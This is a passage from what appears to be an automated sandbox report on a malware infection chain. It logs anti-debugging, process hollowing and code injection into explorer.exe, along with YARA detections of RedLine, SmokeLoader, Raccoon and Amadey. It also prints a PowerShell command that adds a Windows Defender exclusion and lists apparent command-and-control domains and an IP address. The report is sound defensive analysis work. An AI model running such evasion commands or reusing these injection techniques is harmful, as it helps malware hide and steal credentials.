Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47EC9B mov eax, dword ptr fs:[00000030h] 24_2_6B47EC9B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47EC9B mov eax, dword ptr fs:[00000030h] 24_2_6B47EC9B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B549CB3 mov eax, dword ptr fs:[00000030h] 24_2_6B549CB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474CB0 mov eax, dword ptr fs:[00000030h] 24_2_6B474CB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AD4B0 mov eax, dword ptr fs:[00000030h] 24_2_6B4AD4B0
Source: C:\Users\user\AppData\Local\Temp\B084.exe Code function: 33_2_02B60D90 mov eax, dword ptr fs:[00000030h] 33_2_02B60D90
Source: C:\Users\user\AppData\Local\Temp\B084.exe Code function: 33_2_02B6092B mov eax, dword ptr fs:[00000030h] 33_2_02B6092B
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00416842 mov eax, dword ptr fs:[00000030h] 34_2_00416842
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00412AB1 mov eax, dword ptr fs:[00000030h] 34_2_00412AB1
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\cnv622JnZv.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8615.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B084.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_00420900 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00420900
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00401F20 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree, 34_2_00401F20
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A6B90 rdtsc 24_2_6B4A6B90
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B99A0 ZwCreateSection,LdrInitializeThunk, 24_2_6B4B99A0
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_00420900 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00420900
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_0041D190 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041D190
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 17_2_0041CC60 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_0041CC60
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 17_2_004203D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_004203D0
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00410E58 SetUnhandledExceptionFilter, 34_2_00410E58
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_004110A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 34_2_004110A3
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00415393 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 34_2_00415393
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00410CF3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 34_2_00410CF3

HIPS / PFW / Operating System Protection Evasion:

barindex
Early bird code injection technique detected
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\977B.exe
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: jejhieg.6.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\cnv622JnZv.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\cnv622JnZv.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8615.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8615.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B084.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\B084.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Memory written: C:\Users\user\AppData\Local\Temp\C5EA.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory written: unknown base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\977B.exe Memory written: C:\Users\user\AppData\Local\Temp\977B.exe base: 400000 value starts with: 4D5A
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 17_2_02BA0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 17_2_02BA0110
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\cnv622JnZv.exe Thread created: C:\Windows\explorer.exe EIP: 4F61920 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Thread created: unknown EIP: 6D21920 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8615.exe Thread created: unknown EIP: 3B719C0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B084.exe Thread created: unknown EIP: 6CF1920
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base address: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Section unmapped: unknown base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 402000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 41C000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 41E000 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\977B.exe Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\977B.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\cnv622JnZv.exe Process created: C:\Users\user\Desktop\cnv622JnZv.exe 'C:\Users\user\Desktop\cnv622JnZv.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\jejhieg Process created: C:\Users\user\AppData\Roaming\jejhieg C:\Users\user\AppData\Roaming\jejhieg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Process created: C:\Users\user\AppData\Local\Temp\C5EA.exe C:\Users\user\AppData\Local\Temp\C5EA.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /SpecialRun 4101d8 4380 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process created: C:\Users\user\AppData\Local\Temp\977B.exe 977B.exe
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process created: unknown unknown
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError, 25_2_00401C26
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AE730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 24_2_6B4AE730
Source: explorer.exe, 00000006.00000000.301003169.0000000001640000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.301003169.0000000001640000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.301003169.0000000001640000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000006.00000000.286961405.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000006.00000000.301003169.0000000001640000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000006.00000000.301003169.0000000001640000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\66A4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Users\user\AppData\Local\Temp\77DC.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\977B.exe Queries volume information: C:\Users\user\AppData\Local\Temp\977B.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\977B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A557.exe Queries volume information: C:\Users\user\AppData\Local\Temp\A557.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A557.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A557.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00410B13 cpuid 34_2_00410B13
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_004234B0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_004234B0
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_0041F061 _free,_free,_free,GetTimeZoneInformation,_free, 34_2_0041F061
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00401F20 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree, 34_2_00401F20
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 24_2_6B4A4020

Stealing of Sensitive Information:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 00000028.00000000.477374112.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.478964555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.518079752.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.476131601.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 19.0.jejhieg.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.C5EA.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.C5EA.exe.2ba15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.jejhieg.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.1.jejhieg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.1.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.C5EA.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.cnv622JnZv.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.jejhieg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.8615.exe.2fb0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.C5EA.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.3.8615.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.jejhieg.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.jejhieg.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.8615.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000002.465682057.00000000047F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.440048320.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.440144777.0000000002FF1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.320318511.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.379053476.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.302632865.0000000004F61000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.379166058.0000000001F61000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.464888081.0000000002B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.423422124.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.320173015.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Raccoon Stealer
Source: Yara match File source: 35.3.152F.exe.48f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.152F.exe.48f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.152F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.152F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.460198021.00000000048F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.478734177.0000000000941000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.476969852.00000000013F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.593634201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 152F.exe PID: 1280, type: MEMORYSTR
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: 152F.exe PID: 1280, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 00000028.00000000.477374112.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.478964555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.518079752.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.476131601.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 19.0.jejhieg.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.C5EA.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.C5EA.exe.2ba15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.jejhieg.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.1.jejhieg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.1.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.C5EA.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.cnv622JnZv.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.jejhieg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.8615.exe.2fb0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.C5EA.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.3.8615.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.jejhieg.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.jejhieg.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.8615.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000002.465682057.00000000047F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.440048320.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.440144777.0000000002FF1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.320318511.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.379053476.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.302632865.0000000004F61000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.379166058.0000000001F61000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.464888081.0000000002B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.423422124.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.320173015.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 35.3.152F.exe.48f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.152F.exe.48f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.152F.exe.400000.0.raw.unpack, type: UNPACKEDPE
